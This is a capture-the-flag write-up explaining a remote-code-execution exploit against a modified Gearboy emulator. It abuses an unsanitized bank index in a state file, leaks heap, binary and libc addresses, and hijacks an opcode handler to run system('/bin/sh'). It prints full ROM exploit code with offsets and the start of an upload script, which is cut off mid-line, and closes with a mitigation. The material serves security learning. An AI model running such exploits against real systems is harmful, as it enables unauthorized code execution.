---
documentclass: extarticle
geometry: margin=2cm
title: Gearboy Writeup
author: sinitax
fontsize: 12pt
---

## Exploit

The task is to gain remote code execution (at least to the point of reading the contents of the flag file) by manipulating only a Game Boy ROM and state file, which are run on the server using a modified, headless version of [*Gearboy*](https://github.com/drhelius/Gearboy), a Game Boy emulator.

My immediate suspicion was that checks were missing for the state file rather than the ROM: a state can be saved at any point during execution, and it is generally easier to forget a check before every use of a value than a single check when loading the ROM.

Inspecting the source code of `GearboyCore::LoadState`, we find the emulator's functionality split across many classes, each with its own `LoadState`, e.g. `Processor::LoadState` and `Memory::LoadState`.

`Memory::LoadState` loads, among other things, various memory bank buffers as well as the values which control which of those banks are selected. Since the address space of the Game Boy is limited to 16 bits, parts of the memory must be swapped in and out to give access to larger amounts. Often an index is used to indicate which memory bank is in use, as is the case with `WRAM1`:

```
u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}
```

As long as `m_bCGB` (a flag enabling Game Boy Color mode) is set, the backing buffer of `WRAM1` is chosen from a bank in `m_pWRAMBanks`. The value of `m_bCGB` is determined by special-purpose bytes in the ROM, which we control.

Since `m_iCurrentWRAMBank` is loaded as part of the state and its value is not properly sanitized, modifying this value in the state file allows us to essentially mmap an arbitrary piece of memory, at an offset of our choosing relative to `m_pWRAMBanks`, into the address space of our emulated game. When the running ROM reads from or writes to `0xD000-0xE000`, it will instead access the address we control. But where to write when ASLR is enabled?

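
To make the effect of an unchecked bank index concrete, the following Python sketch models the pointer arithmetic of `GetWRAM1`. It is only an illustration: the helper names are hypothetical, the bank count of 8 is an assumption about the size of the `m_pWRAMBanks` buffer, and it assumes that an access adds the in-window offset to the pointer returned by `GetWRAM1`.

```python
WRAM_BANK_SIZE = 0x1000   # size of the window mapped at 0xD000-0xDFFF
WRAM_BANK_COUNT = 8       # assumption: number of banks in m_pWRAMBanks


def wram1_host_offset(bank_index: int, gb_address: int) -> int:
    """Byte offset from m_pWRAMBanks that a guest access resolves to."""
    if not 0xD000 <= gb_address <= 0xDFFF:
        raise ValueError("address is outside the WRAM1 window")
    return WRAM_BANK_SIZE * bank_index + (gb_address - 0xD000)


def stays_in_buffer(offset: int) -> bool:
    """True if the offset still lies inside the bank buffer."""
    return 0 <= offset < WRAM_BANK_SIZE * WRAM_BANK_COUNT


# A legitimate bank index stays inside the buffer ...
in_range = wram1_host_offset(3, 0xD010)
# ... while a negative index from a crafted state file lands before it.
out_of_range = wram1_host_offset(-2, 0xD010)

print(hex(in_range), stays_in_buffer(in_range))
print(hex(out_of_range), stays_in_buffer(out_of_range))
```

Any index outside the buffer's bank range moves the whole 4 KiB window in steps of `0x1000` bytes relative to `m_pWRAMBanks`, which is what makes nearby heap objects reachable from the ROM.
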
To get around ASLR we need to find objects on the heap which sit at consistent offsets from the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by running `gdbserver` in the docker container and observing the surrounding memory and the pointers of objects allocated shortly before or after the buffer. The fact that each session is a freshly spawned docker container helps with consistency.

Doing this, we find a heap layout which is the same on every first run in the docker container: the `Processor` object is at an offset of `-0x126a0` from `m_pWRAMBanks`, and the `Memory` object is at an offset of `-0xd0` from the `Processor` object.

By setting `m_iCurrentWRAMBank` to `-0x13` in the state file, we are able to access the `Processor` object at `0x13000-0x126a0+0xD000=0xD960` and the `Memory` object at `0x13000-0x12770+0xD000=0xD890`.

For every instruction, the processor resolves the function for handling an opcode by looking it up in a table using the opcode as an index. This `opcodeTable` is a member of the `Processor` object and as such is stored on the heap. By reading one of these function pointers and subtracting its offset in the binary, we can recover the base address at which the Gearboy emulator is loaded.

Now that we know the base address, and as a result the address of the GOT, the natural next step would be to leak libc by reading the GOT, calculate the address of `system` and overwrite a function pointer to call it. The only problem is that we are still just a ROM in an emulator and only have access to the memory mapped into `0xD000-0xE000`.

We need to look for another access primitive. This time, however, we are not limited to the contents of our state and ROM files. We can manipulate the `Memory` and `Processor` objects directly! Looking through the source code again, we find a good candidate:

```
u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}
```

We have already set `m_bCGB`, and `m_iCurrentLCDRAMBank` is loaded from the state file. As such, we can make accesses to `0x8000-0x9000` be backed by the `m_pLCDRAMBank1` buffer, whose pointer we can now overwrite through the `Memory` object.

We set `m_pLCDRAMBank1` in the `Memory` object to point to the GOT entry of `free`, whose address is calculated from the base address. We can then read the address of `free` from `0x8000`, derive the libc base and calculate the address of `system`.

To finally call `system`, we overwrite a function pointer in `Processor::opcodeTable` and execute the corresponding opcode. We ensure the first argument to `system` points to the string **/bin/sh** by writing it to the address of the `Processor` object, as this is the address in `rdi` when `system` is called. Since `opcodeTable` is the first member of `Processor`, we need to choose an opcode whose table entry does not overlap with the space used for the string and which is not executed before the pointer has been fully written (as would be the case with the load instructions). The `stop` instruction (value `0x10`) is a good fit here.

### Mitigation

This attack can be mitigated by performing better input sanitization when loading values from the state file. This would have prevented the initial out-of-bounds read / write and, as such, the subsequent RCE. For `m_iCurrentWRAMBank` this can be implemented as a simple range check.

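
As a rough illustration of such a range check, the following Python sketch validates a bank index read from a state file before it is used. The actual fix would live in the C++ `Memory::LoadState`. The function name, the bank count of 8 and the encoding of the field as a 4-byte little-endian signed integer are assumptions made for this example, not details taken from the Gearboy source.

```python
import struct

WRAM_BANK_COUNT = 8  # assumption: number of banks in m_pWRAMBanks


def load_wram_bank_index(raw: bytes) -> int:
    """Decode a bank index from state data and reject out-of-range values."""
    # Assumption: the field is stored as a 4-byte little-endian signed int.
    (value,) = struct.unpack("<i", raw)
    if not 0 <= value < WRAM_BANK_COUNT:
        raise ValueError(f"invalid WRAM bank index: {value}")
    return value


# A sane index is accepted ...
print(load_wram_bank_index(struct.pack("<i", 1)))

# ... while the index used by the exploit is rejected.
try:
    load_wram_bank_index(struct.pack("<i", -0x13))
except ValueError as err:
    print("rejected:", err)
```

The same pattern would apply to every other index or selector restored from the state file, such as `m_iCurrentLCDRAMBank`.
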
\newpage

**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/}

```C
#include "stdint.h"
#include "string.h"

void main(void) {
    volatile static uint8_t *processor_gb;
    volatile static uint8_t *memory_gb;
    volatile static uint8_t *free_got_gb;
    volatile static uint64_t op0x00;
    volatile static uint64_t base;
    volatile static uint64_t libc;
    volatile static uint64_t free_got;
    volatile static uint64_t target;

    /* WRAM BANK = -0x13 */
    processor_gb = (void*) 0xD960;
    memory_gb = processor_gb - 0xd0;

    /* get base from op0x00 (first opcodeTable entry minus its offset in the binary) */
    op0x00 = *(uint64_t*)processor_gb;
    base = op0x00 - 0x1d420;
    free_got = base + 0x4ad78;

    /* change lcdrambank pointer to access got */
    *(uint64_t*)(memory_gb+0x90) = free_got;
    free_got_gb = (void*) 0x8000;

    /* leak free from the got, derive libc base and the address of system */
    libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
    target = libc + 0x52290;

    /* place the argument string at the start of the Processor object */
    strcpy((char*)processor_gb, "/bin/sh");

    /* overwrite the opcodeTable entry for opcode 0x10 (stop) and trigger it */
    *(uint64_t*)(processor_gb+0x10*0x10) = target;

    __asm \
        stop \
    __endasm;

    while (1);
}
```

\newpage

**Upload and state modification script:**

```python
from base64 import b64encode
from sys import argv,exit
from pwn import *

rom = list(open("main.gb", "rb").read())
state = list(open("main.state", "rb").read())

# set m_iCurrentWRAMBank
for i,v in enumerate(struct.pack("